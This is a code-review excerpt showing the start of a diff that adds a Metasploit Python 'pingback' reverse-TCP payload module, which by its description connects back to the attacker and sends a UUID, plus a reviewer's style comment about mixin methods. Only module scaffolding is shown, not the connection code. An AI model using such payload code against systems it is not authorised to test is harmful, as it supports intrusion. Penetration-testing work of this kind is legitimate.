modules/payloads/singles/python/pingback_reverse_tcp.rb

```diff
@@ -0,0 +1,58 @@
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/python'
+
+require 'msf/base/sessions/pingback'
+require 'msf/core/payload/pingback'
+
+module MetasploitModule
+
+  CachedSize = 185
+
+  include Msf::Payload::Single
+  include Msf::Payload::Pingback
+  include Msf::Payload::Pingback::Options
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name' => 'Python Pingback, Reverse TCP (via python)',
+      'Description' => 'Connects back to the attacker, sends a UUID, then terminates',
+      'Author' => 'asoto-r7',
+      'License' => MSF_LICENSE,
+      'Platform' => 'python',
+      'Arch' => ARCH_PYTHON,
+      'Handler' => Msf::Handler::ReverseTcp,
+      'Session' => Msf::Sessions::Pingback,
+      'PayloadType' => 'python',
+      'Payload' =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  def generate
+    super + command_string
+  end
+
+  def command_string
+    pingback_uuid ||= generate_pingback_uuid
```

Comment:
Since these reference methods defined in a mixin, it would be much clearer to prefix these with `self` as in `self.pingback_uuid ||= ...`